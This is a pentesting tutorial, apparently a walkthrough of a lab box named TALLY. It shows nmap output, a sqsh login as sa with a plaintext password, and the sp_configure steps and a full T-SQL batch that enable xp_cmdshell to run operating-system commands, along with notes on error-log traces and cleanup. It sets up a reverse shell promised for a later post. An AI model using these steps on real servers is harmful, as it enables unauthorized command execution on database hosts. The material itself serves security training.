Finally, I am back with a pentesting tutorial after a few weeks of discussing reverse engineering (assembly).
Usually, once you have access to a database server, the question is what the next move should be. In this post I discuss how to get from a database login to command execution on an MS SQL Server, which is the groundwork for creating a reverse shell from it.
First, confirm that MSSQL is up and reachable using nmap (service detection with -sV also runs the ms-sql-* scripts that identify the instance).
We can see that port 1433 is open:

    1433/tcp open  ms-sql-s  syn-ack ttl 127 Microsoft SQL Server 2016 13.00.1601.00; RTM
    | ms-sql-ntlm-info:
    |   Target_Name: TALLY
    |   NetBIOS_Domain_Name: TALLY
    |   NetBIOS_Computer_Name: TALLY
    |   DNS_Domain_Name: TALLY
    |   DNS_Computer_Name: TALLY
    |_  Product_Version: 10.0.14393
    | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
    | Issuer: commonName=SSL_Self_Signed_Fallback
    | Public Key type: rsa
    | Public Key bits: 2048
    | Signature Algorithm: sha1WithRSAEncryption
    | Not valid before: 2020-01-30T21:51:35
    | Not valid after:  2050-01-30T21:51:35
    | MD5:   8c4b 425d cfa5 28d4 ea66 30c0 3cbc 525c
    | SHA-1: bb46 babd 9897 0f84 7fa7 b56e df63 392a 2040 21e4

A few things worth noting from this output before connecting: the build is SQL Server 2016 RTM (13.00.1601.00) on Windows Server 2016 (product version 10.0.14393), the NetBIOS domain name is the same as the computer name, so the host is standalone rather than domain-joined, and the TTL of 127 is one hop off the Windows default of 128, so there is a single router between us and the target.
I will skip how I found the username and password for the database. Let's jump straight to the shell creation.
You can connect to MSSQL with sqsh using the command below (if the password contains characters your shell treats specially, wrap it in single quotes):

    sqsh -S 10.10.10.56 -U sa -P GWE3V65#6KFH93@4GWTG2G
After connecting with the command above, we need to check whether we can execute operating system commands through xp_cmdshell. Let's try the following:

    1> xp_cmdshell 'whoami'
    2> go
    Msg 15281, Level 16, State 1
    Server 'TALLY', Procedure 'xp_cmdshell', Line 1
    SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.
If you get the error above, xp_cmdshell is disabled (the default since SQL Server 2005) and you need to enable it with sp_configure. This requires the ALTER SETTINGS server permission, which members of the sysadmin and serveradmin roles have; sa is a sysadmin, so it works here. Note that xp_cmdshell is an "advanced" option, so 'show advanced options' has to be switched on first:
    1> EXEC SP_CONFIGURE 'show advanced options',1
    2> reconfigure
    3> go
    Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
    (return status = 0)
    1> EXEC SP_CONFIGURE 'xp_cmdshell',1
    2> reconfigure
    3> go
    Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
    (return status = 0)
With the commands above, our SQL Server is now able to execute operating system commands on the host. Two things to keep in mind: commands run through xp_cmdshell execute as the SQL Server service account (or as the configured xp_cmdshell proxy account when the caller is not a sysadmin), so the output of 'whoami' tells you what privileges you actually have on the box; and both sp_configure changes are written to the SQL Server error log, so this is a noisy step on a monitored server and the setting should be restored when you are done.
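The whole procedure above as a single T-SQL batch, added here as an example rather than taken from the original post. It assumes a sysadmin login (sa in this case) on the target instance, can be pasted into sqsh (or any other client) and terminated with go, and records the original settings so they can be restored afterwards. The xp_readerrorlog call at the end is there to show what a defender watching the error log would see; the search strings are illustrative.

```sql
-- Added example (not from the original post): enable xp_cmdshell, prove
-- command execution, show the log line it leaves behind, and restore the
-- original configuration. Assumes a sysadmin login on the target instance.
USE master;
GO

-- 1. Record the current state so it can be restored later. 'value_in_use'
--    is what the running instance actually uses right now.
DECLARE @advanced INT, @cmdshell INT;
SELECT @advanced = CAST(value_in_use AS INT)
  FROM sys.configurations WHERE name = 'show advanced options';
SELECT @cmdshell = CAST(value_in_use AS INT)
  FROM sys.configurations WHERE name = 'xp_cmdshell';
PRINT 'before: show advanced options=' + CAST(@advanced AS VARCHAR(1))
    + ' xp_cmdshell=' + CAST(@cmdshell AS VARCHAR(1));

-- 2. Enable xp_cmdshell only if it is off. It is an advanced option, so
--    'show advanced options' must be 1 before sp_configure accepts it.
IF @cmdshell = 0
BEGIN
    EXEC sp_configure 'show advanced options', 1;
    RECONFIGURE;
    EXEC sp_configure 'xp_cmdshell', 1;
    RECONFIGURE;
END;

-- 3. Prove execution and learn which account the OS commands run as.
--    Capturing the output in a table is easier to work with than reading
--    it off the screen; xp_cmdshell returns a trailing NULL row we drop.
DECLARE @out TABLE (line NVARCHAR(4000));
INSERT INTO @out EXEC xp_cmdshell 'whoami';
SELECT line AS whoami_output FROM @out WHERE line IS NOT NULL;

-- 4. What the defender sees: sp_configure writes a "Configuration option
--    'xp_cmdshell' changed from 0 to 1" line to the SQL Server error log.
--    Arguments: log number (0 = current), log type (1 = SQL Server log),
--    and two search strings that both have to match.
EXEC xp_readerrorlog 0, 1, N'Configuration option', N'xp_cmdshell';

-- 5. Put the configuration back the way it was.
IF @cmdshell = 0
BEGIN
    EXEC sp_configure 'xp_cmdshell', 0;
    RECONFIGURE;
END;
IF @advanced = 0
BEGIN
    EXEC sp_configure 'show advanced options', 0;
    RECONFIGURE;
END;
GO
```

If you intend to keep using xp_cmdshell for the next steps (for example to launch a reverse shell), run steps 1 to 4 first and keep step 5 for the end of the engagement; the restore block is also a second pair of log lines, so on a monitored server the cleanest option is to do the whole thing in one sitting.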
That is all for now. In the next post I will continue with the reverse shell creation, using Nishang PowerShell launched through xp_cmdshell.